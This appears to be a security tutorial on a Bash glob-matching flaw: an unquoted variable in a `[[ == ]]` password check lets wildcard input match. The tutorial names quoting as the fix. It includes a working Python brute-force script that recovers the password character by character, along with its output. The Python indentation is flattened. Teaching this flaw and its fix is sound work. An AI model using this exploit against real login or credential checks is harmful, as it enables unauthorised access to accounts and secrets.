Bash
Variable Comparison Vulnerability
#!/bin/bash
DB_USER="root"
DB_PASS="$(/usr/bin/cat /home/root/cred.txt)"
read -s -p "Enter password for $DB_USER: " USER_PASS
echo
if [[ $DB_PASS == $USER_PASS ]]; then
echo "Password confirmed!"
else
echo "Password confirmation failed!"
fi
The vulnerability here lies in the issue of variable comparison.
The correct way would be this: "$var"
Instead of this: $var
Exploit Vulnerability:
This vulnerability allows us to discover the password through brute force.
In this case, cred.txt contains the password k4l1L1nUx.
The program will interpret [[ $DB_PASS == k4l1L1nUx ]] the same as [[ $DB_PASS == k* ]].
So through testing, we would discover the password. To automate it, we will use a Python script.
import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
file = str(input("File name: "))
found = False
while not found:
for character in all:
command = f"echo '{password}{character}*' | ./{file}"
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
password += character
# Remove the comment if you want me to show you the process of how it is finding the password.
# print(password)
break
else:
found = True
print("The password is: ", password)
The result upon executing the script:
kali@kali:~$ python3 script.py
File name: bash_vuln
k
k4
k4l
k4l1
k4l1L
k4l1L1
k4l1L1n
k4l1L1nU
k4l1L1nUx
The password is: k4l1L1nUx
Last updated